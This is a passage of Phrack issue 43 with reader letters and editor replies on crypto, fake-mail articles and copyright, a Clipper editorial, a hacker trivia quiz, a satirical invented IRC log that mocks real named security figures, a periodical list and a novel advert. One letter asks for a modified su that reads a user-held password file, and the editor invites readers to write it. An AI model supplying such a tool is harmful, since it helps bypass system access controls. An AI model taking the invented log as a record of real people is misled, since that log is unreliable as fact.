get the dope on these volunteers, please contact him at tye@nws.globe.com
Or call at 617-929-3342.

Help especially appreciated from anyone in the BOSTON area. Soon.

Thanks.

[Editor: Interesting. This showed up in my box in late June, so it should
 still be going. I would recommend watching yourselves in any dealings
 with journalists. Take it from one who has been burned by the press.
 (And who has a journalism degree himself.)]

****************************************************************************

Hey there...

I don't know if this will get to Dispater or to the new editor. Since the
change in editorship, the proper way to contact Phrack has become sort of a
mystery. (The new address wasn't included in Phrack 31.)

Anyway, I'm writing to bitch about the quality of #31. I've got two main
beefs:

1. The article about fake-mail was GREAT until it turned into a "how-to"
primer on using the info given to cause damage. That is exactly the kind of
thing that will end up getting you sued.
I have some legal background, and I'm pretty sure that the author of that article and possibly even Phrack itself and its editors are now open to a damn good argument for tortuous negligence if anyone follows the instructions and damages someone on Compuserve, etc. The argument will go something like, "Phrack set into motion a chain of events that led to my client being damaged." You guys should have just given the info, and left off the moronic ways to abuse it. 2. The article on "Mall Security Frequencies" was copied directly from Popular Communications, Nov. 1992 issue. Hell, that was even their cover story. Can we say "copyright enfringement?" If not, I'm sure you'll be _hearing_ it a few more times. If I was still practicing, I'd call 'em up and ask their permission to sue on contingency. Split the damages obtained on a motion for summary judgment 50/50 with them. It would only take a week and one filed complaint... Point is, you have opened yourselves up to get sued and lose EASILY. As much as I've enjoyed reading Phrack over the years, if this new staff continues in this manner, I'll be stuck with back-issues. Cyber (305) ------------------------------------------------------------------------- To find out more about the anon service, send mail to help@anon.penet.fi. Due to the double-blind system, any replies to this message will be anonymized, and an anonymous id will be allocated automatically. You have been warned. Please report any problems, inappropriate use etc. to admin@anon.penet.fi. *IMPORTANT server security update*, mail to update@anon.penet.fi for details. [Editor: I think you meant 41, not 31. But to answer your points: 1) As long as there is a first amendment, Phrack will continue to print articles that some may or may not agree with. Printing the blueprints for an atomic bomb does not make you an accomplice to those who build it and detonate it. 2) Numbers are numbers. Can we even spell "copyright infringement?" 
If you were still "practicing..." We at Phrack wholeheartedly encourage you to again pick it up, and keep practicing and practicing until you get whatever it is you were practicing down pat. Obviously it must have been guitar, and not law. Such a litigious society we live in. Suing Phrack would accomplish nothing. It would not even hinder its publication. Since Phrack has no money, nothing would be gained. Even if fined, Phrack could not be forced to sell its computer equipment to pay fines, since this would be removing the livelihood of the publisher, thus it would continue its quarterly publication. Where on Earth did you get such ideas? You obviously know nothing about lawsuits. Any lawyer would laugh at the thought of suing Phrack since it would gain nothing financially, and provide such a huge amount of bad publicity that even if a judgement were reached in their behalf it would not be worth it. Oh wait, you were a lawyer. Now I know why the past tense. But you are correct on one point: we cannot print copyrighted material without permission. You may have noted that last issue (among other changes) Phrack no longer includes full text of news items without prior permission from the publisher. That was the ONLY thing that worried me about publishing Phrack, and so I changed it. We at Phrack welcome constructive criticism, but at least have the nerve to email directly, rather than hide behind an anonymous remailer. That way, someone could have responded to you in a more direct and expeditious manner.] **************************************************************************** Dear Sir/Madam, I am a student at ukc in England and wish to subscribe to Phrack receiving it as email at the following address ks16@ukc.ac.uk thank you and keep up the good work. We use unix and I would be interested in getting a copy of su (switch user) which looks for the user file passwd.su in the users home directory. 
I don't know much about unix, but I do know it would need to run from my
home directory and access the kernel.

Many thanks for any help you may be able to give.

S

[Editor: It's "SIR" hehe. Sir Bloodaxe. In any case, if anyone would
 care to draft up this modification to su and send it in I'll print it in
 the next issue's line noise.]

****************************************************************************

I had some beef with Rack's article in PHRACK 42. I've attached a writeup
of comments; you're welcome to a) forward it to him, b) shitcan it, or
c) publish it.

thx,
-Paul

My background: I've been into the scene for about 12 years. My day job is
writing unix s/w for a NASA contractor. My night job... well, never mind
that. I have a strong amateur interest in crypto, and I'd like to share
some of what people in the usenet/Internet community have been kind enough
to teach me.

Racketeer sez:

>     If you think that the world of the Hackers is deeply shrouded with
>extreme prejudice, I bet you can't wait to talk with crypto-analysts. These
>people are traditionally the biggest bunch of holes I've ever laid eyes on. In
>their mind, people have been debating the concepts of encryption since the
>dawn of time, and if you come up with a totally new method of data encryption,
> -YOU ARE INSULTING EVERYONE WHO HAS EVER DONE ENCRYPTION-, mostly by saying
>"Oh, I just came up with this idea for an encryption which might be the best
>one yet" when people have dedicated all their lives to designing and breaking
>encryption techniques -- so what makes you think you're so fucking bright?

One real reason for this reaction is that people _have_ been studying
encryption for 100 years or so. As a result, many simple cryptosystems are
continually being reinvented by people who haven't ever made even a simple
study of cryptosystems.

Imagine if someone came up to you and said "Wow! I just found a totally
K00L way to send fake mail! It's radical! No one's ever thought of it
before!"

You'd laugh, right? _Anyone_ can figure out how to forge mail.

Well, _anyone_ can come up with the n-th variation of the Vigenere or
substitution cipher.

An even more important reason for their 'tude is that cypherpunks are
suspicious by nature. A key principle of crypto is that you can only trust
algorithms that have been made public and thoroughly picked over. Without
that public scrutiny, how can you trust it?

The fedz' Digital Signature Standard (DSS) got raked in the crypto and
industry press because the fedz wouldn't disclose details of the algorithm.
"How do we know it's secure?" the cypherpunks asked. "We won't use it if we
don't know it's secure!"

Point being: (for those of you who skipped over) cypherpunks trust NO ONE
when the subject is encryption algorithms. Maybe J. Random Hacker has come
up with a scheme faster and more secure than, say, RSA. If JRH won't share
the details, no one will use it.

Racketeer goes on to talk about DES. One important thing to note is that
the unix crypt() function has NOTHING to do with DES. Here's part of the
SunOS 4.1.2 man page for crypt():

     crypt implements a one-rotor machine designed along the lines
     of the German Enigma, but with a 256-element rotor. Methods
     of attack on such machines are widely known, thus crypt
     provides minimal security.

It's fairly clear that a known-ciphertext attack (i.e. you have a block of
encoded text, but neither the key nor the plaintext) will, at worst,
require 2^56 decryption attempts. Various schemes for parallel machines and
so forth have been posted in sci.crypt. Does the NSA have something that
can crack DES? Probably.

Remember that DES is mostly used for short-lived session keys. ATMs are a
good example; they typically use a DES key for one communication session
with the central bank. New session, new key. DES is _not_ very well suited
for long-term encryption, since it can probably be attacked in "reasonable"
time by a determined, well-equipped opponent.

Now, on to PGP. Pretty Good Software was indeed threatened with a lawsuit
by Public Key Partners (PKP). PKP holds the patent on the RSA public-key
algorithm. (Many people, me included, don't think that the patent would
stand up in court; so far, no one's tried.)

The nice thing about PGP is that it offers IDEA and RSA in a nice package.
When you encrypt a file, PGP generates an IDEA session key, which is then
encrypted with RSA. An opponent would have to either a) exhaustively search
the entire IDEA key space or b) break RSA to decrypt the file without the
password.

Racketeer also mentions that PGP can optionally compress files before
encryption. There's a solid crypto reason behind this, too. One well-known
and successful way to attack an encrypted file is to look for patterns of
repeated characters. Since the statistical frequencies of word and letter
use in English (and many other languages; some folks have even compiled
these statistics for Pascal & C!) are well-known, comparing the file
contents with a statistical profile can give some insight into the file's
contents.

By compressing files before encrypting them, PGP is moving the redundancy
out of the text and into the small dictionary of compression symbols. You'd
still have to decrypt the file before you could do anything useful with
that dictionary, or even to determine that it _had_ a signature!

[Editor: Well, Rack is not to blame for all complaints I got about the
 file. I printed a file that was several KBytes short of complete. I
 noticed it seemed odd, but was assured by Rack, TK & Presence that I had
 received the correct file. I was misinformed, and should have known
 better than to print a file I should have known was incomplete. I
 apologize to Rack & to all of you. About the other gripes: Rack, care
 to reply?]
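Two points from Paul's letter above can be checked directly: that looking for repeated patterns is a well-known way into a file enciphered with a Vigenere-family cipher, and that compressing before encrypting takes that redundancy away. The Python below is an added example, not part of the original Phrack file and not PGP's code; the sample text, the key and the repeating-key XOR cipher (a byte-wise Vigenere) are constructed for the demonstration.

```python
import zlib
from collections import Counter

# Constructed sample message: ordinary English, printable ASCII only.
PLAINTEXT = (
    b"The session key is generated fresh for every message and is used only "
    b"once. It encrypts the body of the message with a fast conventional "
    b"cipher, and the session key itself is then encrypted under the public "
    b"key of the recipient. An attacker who wants the message must either "
    b"search the whole key space of the conventional cipher or break the "
    b"public key system. Ordinary English is full of redundancy: the same "
    b"letters, the same short words and the same spaces turn up again and "
    b"again, and that pattern survives any cipher that simply repeats a "
    b"short key over the text. Compressing the message first squeezes most "
    b"of that redundancy out, so the statistics an analyst relies on are no "
    b"longer there to be counted in the ciphertext. This is one reason the "
    b"people who study ciphers trust only designs that have been published "
    b"and picked over in the open for years, and treat the newest home made "
    b"variation of an old cipher with suspicion until it has been tested."
)
KEY = bytes.fromhex("13a75ce13e")   # constructed 5-byte repeating key
COMMON = b" etaoinshrdlu"           # most frequent characters in English text


def xor_repeat(data, key):
    """Byte-wise Vigenere: XOR data with the key repeated end to end."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def index_of_coincidence(data):
    """Chance that two bytes picked at random from data are equal.
    English text scores far higher than uniformly random bytes (1/256)."""
    n = len(data)
    if n < 2:
        return 0.0
    return sum(c * (c - 1) for c in Counter(data).values()) / (n * (n - 1))


def column_ic(data, period):
    """Average IC of the columns data[j::period]. At the true key length
    every column is plain text XORed with one constant byte, so the IC of
    the language shows through."""
    return sum(index_of_coincidence(data[j::period])
               for j in range(period)) / period


def guess_key_length(ct, max_len=12, floor=0.02):
    """Smallest period whose column IC is close to the best one seen, or
    None when no period shows language-like redundancy at all."""
    scores = {n: column_ic(ct, n) for n in range(1, max_len + 1)}
    best = max(scores.values())
    if best < floor:
        return None
    return min(n for n, s in scores.items() if s >= 0.85 * best)


def recover_key(ct, period):
    """For each column keep the key byte whose decryption looks most like
    English: many common characters, no unprintable ones."""
    key = bytearray()
    for j in range(period):
        column = ct[j::period]

        def score(k):
            plain = bytes(c ^ k for c in column)
            common = sum(1 for b in plain if b in COMMON)
            junk = sum(1 for b in plain if not 0x20 <= b <= 0x7E)
            return common - 10 * junk

        key.append(max(range(256), key=score))
    return bytes(key)


def demo():
    direct = xor_repeat(PLAINTEXT, KEY)                  # encrypt as-is
    packed = xor_repeat(zlib.compress(PLAINTEXT), KEY)   # compress first
    period = guess_key_length(direct)
    return {
        "ic_plain": round(index_of_coincidence(PLAINTEXT), 4),
        "ic_compressed": round(index_of_coincidence(zlib.compress(PLAINTEXT)), 4),
        "period_found_direct": period,
        "key_recovered_direct": recover_key(direct, period) == KEY,
        "period_found_compress_first": guess_key_length(packed),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name:>28}: {value}")
```

Compression removes the statistical handle only; it does not make a repeating-key cipher sound, since known bytes at a known position (a fixed file header, for instance) still give up the key bytes they cover.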
***************************************************************************** In issue #42 of Phrack there was an article about the USPS' practice of selling change of address information without consumer consent. I sent the supplied form letter and carbon copied my congressman and senators. Today I received a reply from the USPS Records Office. April 1, 1993 Dear Mr. Rosen: This concerns your recent Privacy Act request for accountings of disclosure of mail forwarding information you have provided to the Postal Service. Disclosure of your forwarding address might have been made to individual requesters by post offices or to subscribers to the National Change of Address File (NCOA) by an NCOA licensee. The NCOA is a consolidated file of all forwarding information provided by postal customers and stored on automated media. Listholders may subscribe to NCOA to obtain the new addresses of individuals for whom they already have in their possession the old address. For disclosures made by post offices, we are in the process of querying the Washington, DC postmaster for any accountings. For disclosures made from the NCOA system, we will begin querying NCOA licensees all of which keep logs identifying the particular subscribers to whom they have given NCOA information. This accounting will not identify with certainty the subscribers who have in fact received your new address, but will give you a list of all subscribers receiving NCOA service for the relevant time period and thus might have received your address. Because a large number of requests like yours are being received, there will be a delay in responding. Requests are being processed in order of receipt and you will be sent the accountings as soon as possible. Your patience is appreciated. Sincerely, Betty E. Sheriff USPS Records Officer [Editor: Thanks for sending that letter in! Amazing that someone in the maze of red tape even thought to make a form letter to respond. I think I'll demand a disclosure as well.] 
****************************************************************************

Phrack 42 Errata

We mistakenly noted that the TRW video shown at HoHoCon was dubbed by
Dispater and Scott Simpson. It was actually made by Dispater and ZIBBY.

****************************************************************************

                              ==Phrack Magazine==

                 Volume Four, Issue Forty-Three, File 3a of 27

                                   EDITORIAL

                           My Problems With Clipper
                               by Chris Goggans

The introduction of the new government-backed encryption chip, Clipper, has
become a much-debated issue. I, like many others, have a large number of
problems with the chip and with the problems it may bring in the future.

Why should we believe that this algorithm is robust? For years and years
the NSA has backed DES as the encryption standard, when cryptanalysts have
consistently brought its strength into question. Additionally, the NSA has
forced companies to submit their routines for analysis before allowing them
to be distributed commercially. At times they have even requested that the
algorithms be purposely weakened (we will assume that this was so they
could more easily decipher the encrypted data). With this in mind, why
should we now meet anything endorsed by the NSA with anything but
suspicion? And the fact that they refuse to release the algorithm for
security reasons even further adds to the suspicion that this chip is
either inherently weak and easily broken by the NSA or that there is a
backdoor in the algorithm that will allow the NSA to effortlessly view any
data encrypted with the Clipper.

Assume that the government is on the level (for once), and that they
cannot decipher Clipper-encrypted data without legally obtaining keys from
the assigned escrow agents. The idea that the government will have to go
before a judge and show just cause for needing the keys pacifies some, but
from my own personal experience, the government will always get what they
want. If the Secret Service could get a search warrant to enter my home
based solely upon one posting to an electronic bulletin board, they could
certainly obtain the necessary keys needed to decipher my speech. In fact,
most non-technical persons will become needlessly suspicious upon the mere
mention of someone using encrypted speech mechanisms and be more easily
swayed to release the keys to law enforcement.

Should Clipper be adopted by various government agencies for use, this
could have serious trickle-down effects upon the lives of regular citizens.
Let's say the military decides that they will use Clipper. They will then
most likely require their various contractors to use it as well. Then after
continued use, the contractor may begin to tell its other customers to
communicate with them using Clipper also. Usage could grow exponentially as
more and more people become comfortable with the use of the secure
communications devices until it becomes a de facto standard without any
legal pressures to use it ever mandated by Congress. Should Congress
mandate its use in any form, even if only within the government itself,
this potentiality will rapidly become reality.

If Clipper eventually receives such accepted use, anyone using any other
type of encryption will be immediately suspect. "Why aren't you using the
chip? What do you have to hide?" The government may even outlaw the use of
any other encryption technologies, and if America has become comfortable
and satisfied with Clipper such a law may go unchallenged. After all, only
spies, child pornographers and drug dealers would have something to hide,
right?

As the world's computer networks creep ever further into our daily lives,
and the speed and power of supercomputers multiplies every year, a rather
frightening scenario emerges. Since the government is a major funder of the
Internet, who is to say that Clipper won't become the basis for encrypting
over its lines?
As our country moves closer to ISDN and the PSTN and the PSDN's become more
intertwined, who is to say that Clipper won't be the basis for encryption
since companies like AT&T already endorse it?

Imagine if you will, a massively parallel supercomputer, the likes of which
may not exist yet, in a special room in Ft. Meade, or buried underground in
New Jersey, that consistently decrypts all communications and sorts them
according to communicating parties. Then through the use of AI, the
computer decides whether or not such communication presents a threat "to
national security."

The structure of the telephone network already supports such an
arrangement. The purpose of the NSA allows for such an arrangement. The
advances in computer technology will give the potential for such an
arrangement. If Clipper is tainted, yet accepted, there will be no more
privacy in America.

Perhaps my view of the government and their ultimate intentions is way off
base. I sincerely hope so, as I do not want to be forced to take the mark
of this beast to conduct my business dealings and to live my life in peace.

                              ==Phrack Magazine==

                 Volume Four, Issue Forty-Three, File 4 of 27

                           //   //  /\   //   ====
                          //   //  //\\ //   ====
                         ==== //  //  \\/   ====

                     /\   //  // \\    //  /===   ====
                    //\\ //  //   //  //   \=\   ====
                   //  \\/    \\ //  //   ===/  ====

******************************************************************************

                               PHRACK TRIVIA

This is pretty damn hard. In fact, some of it is downright obscure. And the
bonuses? Forget about it.

Answer the questions, expand the acronyms, explain the numbers.

The five highest scorers by the next issue (or the first 5 to get perfect
scores) win COOL STUFF!

Send your answers to phrack@well.sf.ca.us

1) CCIS
2) Stimpson J. Cat's Roommate is?
3) Name the cracker.
4) METAL AE password.
5) Who invented the TeleTrial?
6) Name Bloom County's hacker.
7) What was the Whiz Kids' computer named?
8) Western Union owned what long distance service?
9) What computer read both Apple ][ and IBM PC disks?
10) Who made the "Charlie" board?
11) How many credits for a CNE?
12) What was in the trunk of the Chevy Malibu?
13) Name three bands A. Jourgensen had a hand in.
14) SYSTEST Password:
15) What computer makes the best SimStim decks?
16) What magazine brought the telephone underground to national attention
    in 1971?
17) What is the significance of 1100 + 1700 hz?
18) What magazine was raided for publishing black box plans?
19) What BBS raid spawned the headlines "Whiz Kids Zap Satellites" ?
20) CLASS
21) What computer responds "OSL, Please" ?
22) RACF secures what OS?
23) The first person to create a glider gun got what?
24) QRM
25) PSS
26) What PSN was acquired by GTE Telenet?
27) 914-725-4060
28) April 15, 1943
29) 8LGM
30) WOPR
31) What happened on March 1, 1990?
32) Port 79
33) Who starred in the namesake of Neil Gorsuch's UNIX security mailing
    list?
34) What Dutch scientist did research in RF monitoring?
35) What was the author of GURPS Cyberpunk better known as?
36) Who would "Piss on a spark plug if he thought it would do any good?"
37) What thinktank did Nickie Halflinger escape from?
38) NCSC
39) Who is Pengo's favorite astronomer?
40) What language was Mitnik's favorite OS written in?
41) Abdul Alhazred wrote what?
42) The answer to it all is?
43) Who is the father of computer security?
44) Who wrote VCL?
45) What kind of computer did Cosmo have?
46) Hetfield, Ulrich, Hammet, Newstead
47) What company wrote the computer game "Hacker?"
48) Who does Tim Foley work for?
49) Who played Agent Cooper?
50) Vines runs over what OS?
51) Mr. Peabody built what?
52) Who makes SecurID?
53) What's in a Mexican Flag?
54) Who created Interzone?
55) JAMs (as led by John Dillinger)
56) Abbie Hoffman helped start what phreak magazine?
57) What was once "Reality Hackers?"
58) Gates and Allen "wrote" BASIC for what computer?
59) Tahoe is related to what OS?
60) CPE 1704 TKS is what?
61) Telemail's default was what?
62) "Do Androids Dream of Electric Sheep" became what?
63) What broadcasts between roughly 40 and 50 mhz?
64) Who created Tangram, Stratosphere, and Phaedra among others?
65) What was Flynn's most popular video game?
66) Who lived in Goose Island, Oregon?
67) 516-935-2481
68) What is the security of ComSecMilNavPac?
69) What has the "spiral death trap?"
70) Who was the Midnight Skulker?
71) TMRC
72) Who wrote "Jawbreaker?"
73) 213-080-1050
74) What is the Tetragrammaton represented as?
75) Who is Francis J. Haynes?
76) Who ran into one of the Akira test subjects?
77) What had "Munchies, Fireballs and Yllabian Space Guppies?"
78) PARC
79) Alex and his droogs hung out where?
80) Jane Chandler in DC's "Hacker Files" is based on who?
81) The Artificial Kid lives on what planet?
82) 208057040540
83) What are the two most common processors for cellular phones?
84) Who came up with the term "ICE?"
85) What group is hoped might help the "Angels" contact RMS?
86) Who is Akbar's friend?
87) What company's games was David Lightman after?
88) 26.0.0.0
89) Who was Mr. Slippery forced to locate?
90) Who is "The Whistler?"
91) What use would a 6.5536 crystal be?
92) .--. .... .-. .- -.-. -.-
93) The Dark Avenger likes what group?
94) What book spawned the term "worm?"
95) Michael in "Prime Risk" wanted money for what?
96) Automan's programmer worked for who?
97) What signal filled in keystrokes on TOPS-20?
98) ITS
99) (a/c)+121
100) What drug kept the scanners sane?

Bonus 1   3 pts   Name three bodies of work by Andrew Blake.
Bonus 2   3 pts   Name three currently available titles with N. L. Kuzma.
Bonus 3   4 pts   Why would I hate Angel Broadhurst?

*****************************************************************************

                        IF SECURITY TYPES WERE K-RAD

----------------------------------------------------------------

IRC log started Fri June 18 01:14 *** Value of LOG set to ON bye peter *** Signoff: hackman (slavin' to da' MAN at TRW) Dudez, I HATE filling out thez incident Rep0rtz MUAHAHA Tuff J0b edd1e!
Funni *** zen (zen@death.corp.sun.com) has joined channel #CERT re dan, just missed yer pal peety Hi Dan! pal? right. ask the wife... re d00dz, we have SO many bugz. sux 2 be me. *** venom has left channel #CERT *** venom (weitse@wzv.win.tue.nl) has joined channel #CERT *** venom has left channel #CERT *** venom (weitse@wzv.win.tue.nl) has joined channel #CERT *** venom has left channel #CERT *** venom (weitse@wzv.win.tue.nl) has joined channel #CERT ARG! WTF Weitse? s0rri Where is everyone? Anyone seen spaf? I have. He was going to install something. He should be bak. ah *** Action: Ed throws darts at a cracker heh muaha *** bartman is now known as Cracker *** Action: Cracker hacks Cert with an axe dats a good 1 *** Action Ed kicks cracker in the nuts OUCH! *** Signoff: donn (Bad Link?) [high voice] fuk u CERT! heh. *** Action: Pat is ROFL wonder who's on #hack? Mebbe i should go log em. Yeah. Oh hey, I got certbot online. Ill send it to go log. *** certbot (ed@cert.org) has joined channel #CERT *** certbot has left channel #CERT this will be fun. Hey, letz deop them and take over the channel. thats L A M E Ooooh. OPWARZ! I'll go make their channel +i muahaha *** Cracker has left channel #CERT *** Casper (casper@fwi.uva.nl) has joined channel #CERT re all hey dik-head. re hahahaha hi d00d. funni whitesey venombreath lame. *** donn (parker@bandit.sri.com) has joined channel #CERT 'sup? re, oh great bald one eat me bahhahaha Now now boyz. *** spaf (spaf@cs.purdue.edu) has joined channel #CERT Spaffie! 3l33t SPAF! re spaf Yo. spaf...your book sucks. oh fuck off dutch boy. HEY!$!@% *** spaf has been kicked off channel #CERT by Casper thx dude oh gawd...feetball *** spaf (spaf@cs.purdue.edu) has joined channel #CERT lame *** Mode change "+o -o spaf Casper" on channel #CERT by Pat thanks sweetie. op! *** Mode change "+o Casper" on channel #CERT by venom thx d00d Hey dan, you got those patches online? maybe. What YOU got? WAREZZ heh I dunno. Ill dcc you a filelist. 
kool *** zardoz (neil@cpd.com) has joined channel #CERT HEY ... anyone want to contribute to my new list? not me mebbe. Whats this one called? Coredoz? what list? BAH. Fuck your list man. More crackrs have them than we do! who pissed in your coffee gene? heh *** zardoz is now known as neil bah... I'm sick of those dicks using my own holes against me! Your holes? Yer a-hole? What is your list about this time? same thing. Its called REWT! *** neil is now known as REWT SEND ME YER BUGZ!@# *** Action: spaf sends REWT a 50 gig coredump :) u r lame. *** REWT is now known as neil I hate these reports. I wish I got to travel more. come see me! oooohhhh....netsex! tramp. :P *** bill (whmurray@dockmaster.ncsa.mil) has joined channel #CERT word! hi bill. Bill! D00d! I am gonna be in Ct. next week! RAD! call me voice at werk. we'll thrash! you know it! oh puh-lease...the geriatric partiers :) farmboy ***** ***** ***** ***** * * * * * * *** **** * * * * * * ***** ***** * * * ***** * * * ***** ***** ** * * * * * * * ** **** * * * *** ***** ** * * * * * * * * * ***** ***** ***** ***** ** No DUMPING! cert freshens your breath ACK! hee! certs haha *** ray (kaplan@bpa.arizona.edu) has joined channel #CERT hey guys! ugh. Cracker lover alert. commie Hey ray, come to snoop for your little cracker friends? come on, give it a rest guys. hi ray ? *** Action: spaf spits on ray heh *** ray has been kicked off channel #CERT by spaf *** Mode change "+b *!*@bpa.arizona.edu" on channel #CERT by spaf hey I wanted to talk to him about my list... tough shit. heh. *** bartman (ddrew@opus.tymnet.com) has joined channel #CERT re how goes the takeover? didja kick em? #hack is +i! muahahaha how exciting. not they deserve it...they are all punks. hmm..did you get emails? I may want to call their admins. nope damn. certbot was there. He got it. coolness *** Signoff: bill (Bad link?) ne1 going to hactics thing? me besides you. duh. dunno. not me. 
I have no desire to pay for anything done by hackers That reminds me. Did anyone subscribe to Phrack? nope. oops. HAHAHAHAHAHA heh. Whats phrak? nope. my list is better. Who wants on it? me! what list? OOH! I have mail! bye! itz an ansi bomb! bye Pat l8r heh. *** Signoff: Pat (Hugs to all) well, i better do something productive 2. cya slatez d00d. *** Signoff: Casper (Hi ho hi ho its off to work I go) man its late. I better go. I gotta speech in the morn you are getting old. am not are so am not are too! infinity hasta *** Signoff: donn (|/dev/null) laterz geez. what a bunch of lamers. (ray/#CERT) UNBAN ME! hahaha never gives up does he? seriously ed, Ive helped you guys out, send me stuff for REWT. ill think about it not it will be most savory. I promise. And secure! pfft...and monkeys might fly out of my butt Ill think about it. heh, I should do one called Supernova. Exploding suns. hehe heh dats tha tr00f! i like my sun i know a bunch of crackerz who like bt's suns too. hahahahahahahahahaha oh shit. Im late. *** Signoff: venom (LATE!) late 4 what? his vasectomy. har har heh *** REVENGE (kaplan@ai.bpb.arizona.edu) has joined channel #CERT *** Mode change "+o REVENGE" on channel #CERT by eff.org whoops *** Mode change "+i" on channel #CERT by REVENGE fuCK! KICK HIM! *** spaf has been kicked off channel #CERT by REVENGE *** neil has been kicked off channel #CERT by REVENGE *** bartman has been kicked off channel #CERT by REVENGE *** Ed has been kicked off channel #CERT by REVENGE *** zen has been kicked off channel #CERT by REVENGE *** REVENGE is now known as ray hehe --------------------------------------------------------------------- **************************************************************************** Phrack Library of Periodicals 2600 Subscription Department P.O. Box 752 Middle Island, NY 11953-0752 $21.00/Year Animation Magazine 5889 Kanan Road, Suite 317 Agoura Hills, CA 91301 $21.00/Year Bank Technology News Faulkner & Gray, Inc. 
Eleven Penn Plaza New York, NY 10117-0373 $50.00/Year
Ben Is Dead P.O. Box 3166 Hollywood, CA 90028 $20.00/Year
Boardwatch Magazine 7586 West Jewell Ave., Suite 200 Lakewood, CO 80232 $36.00/Year
Boing Boing 11288 Ventura Blvd. #818 Studio City, CA 91604 $14.00/Year
Communications of the ACM 1515 Broadway New York, NY 10036 $30/Year
CQ - The Radio Amateur's Journal 76 North Broadway Hicksville, NY 11801-9962 $22.95/Year
Details P.O. Box 50246 Boulder, CO 80321 12.00/Year
Dirt 230 Park Ave New York, NY 10169 (Supplement to Sassy & Marvel Comics)
Electronics Now Subscription Service P.O. Box 51866 Boulder, CO 80321-1866 $17.97/Year
Farout 9171 Wilshire Blvd. Suite 300 Beverly Hills, CA 90210 $3.95/Issue
Fate 170 Future Way P.O. Box 1940 Marion, OH 43305-1940 $18.00/Year
Femme Fatales P.O. Box 270 Oak Park, IL 60303 $18.00/Year
Film Threat Subscriptions Department P.O. Box 16928 N. Hollywood, CA 91615-9960 $11.85/Year
Film Threat Video Guide P.O. Box 3170 Los Angeles, CA 90078-3170 $12/Year
Fringe Ware Review P.O. Box 49921 Austin, TX 78765 $12.00/Year
Future Sex 1095 Market Street, Suite 809 San Francisco, CA 94103 $18.00/Year
Gray Areas P.O. Box 808 Broomall, PA 19008-0808 $18.00/Year
High Times P.O. Box 410 Mt. Morris, IL 61054 $29.95/Year
IEEE Spectrum 445 Hoes Lane P.O. Box 1331 Piscataway, NJ 08855-1331 800-678-IEEE for info
The "I Hate Brenda" Newsletter c/o Ben Is Dead P.O. Box 3166 Hollywood, CA 90028 $2.00
InfoSecurity News P.O. Box 3168 Lowell, MA 01853-3168 $40.00/Year
International UFO Library Magazine 11684 Ventura Blvd. #708 Studio City, CA 91604 $15.00/Year
Magical Blend 1461 Valencia St. Dept. GA San Francisco, CA 94110 $14.00/Year
Midnight Engineering 1700 Washington Ave. Rocky Ford, CO 81067-9900 $19.95/Year
Mobile Office Subscription Department 21800 Oxnard St. Suite 250 Woodland Hills, CA 91367-9644 $23.90/Year
Mondo 2000 P.O. Box 10171 Berkeley, CA 94709 $24.00/Year
Monitoring Times P.O.
Box 98 140 Dog Branch Road Brasstown, NC 28902-0098 $19.95/Year
New Media P.O. Box 1771 Riverton, NJ 08077-9771 $48.00/Year
The Nose 1095 Market Street, #812 San Francisco, CA 94103-9654 $15.00/Year
Nuts & Volts 430 Princeland Court Corona, CA 91719-9938 $17.00/Year
Popular Communications 76 North Broadway Hicksville, NY 11801-9962 $19.95/Year
Sassy P.O. Box 50093 Boulder, CO 80321-0093 $9.97/Year
Security Insider Report 11511 Pine St. North Seminole, FL 34642 $99.00/Year
SunExpert Magazine 1330 Beacon St. Brookline, MA 02146-3202 $60.00/Year
Tech Connect 12407 MoPac Expwy. N. #100-374 Austin, TX 78758-2499 $12.00/Year
Telephone Engineer & Management Advanstar Communications, Inc. P.O. Box 6100 Duluth, MN 55806-9822 $24.00/Year
UFO 1536 S. Robertson Blvd. Los Angeles, CA 90035 $21.00/Year
Wild Cartoon Kingdom 9171 Wilshire Blvd., Suite 300 Beverly Hills, CA 90210 $3.95/Issue
Wired P.O. Box 191826 San Francisco, CA 94119-1826 $20.00/Year

*****************************************************************************

!!!!POST EVERYWHERE!!!!

THE WORLD'S FIRST NOVEL-ON-THE-NET (tm) SHAREWARE!!!
By Inter.Pact Press

"TERMINAL COMPROMISE" by Winn Schwartau

A high tech thriller that comes from today's headlines!

"The Tom Clancy of computer security."
Assoc. Prof. Dr. Karen Forcht, James Madison University

"Terminal Compromise" is a highly praised novel about the invasion of the United States by computer terrorists. Since it was first published in conventional print form, (ISBN: 0-962-87000-5) it has sold extremely well world-wide, but then again, it never hit the New York Times Bestseller List either. But that's OK, not many do.

Recently, someone we know very well came up with a real bright idea. They suggested that INTER.PACT Press take the unprecedented, and maybe slightly crazy, step to put "Terminal Compromise" on the Global Network thus creating a new category for book publishers.
The idea is to offer "Terminal Compromise," and perhaps other titles at NOVEL-ON-THE-NET SHAREWARE(tm) rates to millions of people who just don't spend a lot of time in bookstores.

After discussions with dozens of people - maybe even more than a hundred - we decided to do just that. We know that we're taking a chance, but we've been convinced by hackers and phreakers and corporate types and government representatives that putting "Terminal Compromise" on the net would be a fabulous step forward into the Electronic Age, (Cyberspace if you will) and would encourage other publishers to take advantage of electronic distribution. (It's still in the bookstores, though.)

To the best of our knowledge, no semi-sorta-kinda-legitimate-publisher has ever put a complete pre-published 562 page book on the network as a form of Shareware. So, I guess we're making news as well as providing a service to the world's electronic community. The recommended NOVEL-ON-THE-NET SHAREWARE fees are outlined later (this is how we stay in business), so please read on.

WE KEEP THE COPYRIGHTS!

"Terminal Compromise" is NOT being entered into the public domain. It is being distributed electronically so hundreds of thousands more people can enjoy it and understand just where we are heading with our omnipresent interconnectedness and the potential dangers we face. INTER.PACT Press maintains all copyrights to "Terminal Compromise" and does not, either intentionally or otherwise, explicitly or implicitly, waive any rights to this piece of work or recourses deemed appropriate. (Damned lawyers.)

(C) 1991, 1992, 1993, Inter.Pact Press

TERMINAL COMPROMISE - THE REVIEWS

" . . . a must read . . ."
Digital News

"Schwartau knows about networks and security and creates an interesting plot that will keep readers turning the pages."
Computer World

"Terminal Compromise is fast-paced and gripping. Schwartau explains complex technology facilely and without condescension."
Government Computer News

"An incredibly fascinating tale of international intrigue . . . action . . . characterization . . . deserves attention . . . difficult to imagine a more comprehensive resource."
PC Laptop

"Schwartau . . . has a definite flair for intrigue and plot twists. (He) makes it clear that the most important assets at risk are America's right to privacy and our democratic ideals."
Personal Identification News

"I am all too familiar with the appalling realities in Mr. Schwartau's book. (A) potentially catastrophic situation."
Chris Goggans, Ex-Legion of Doom Member.

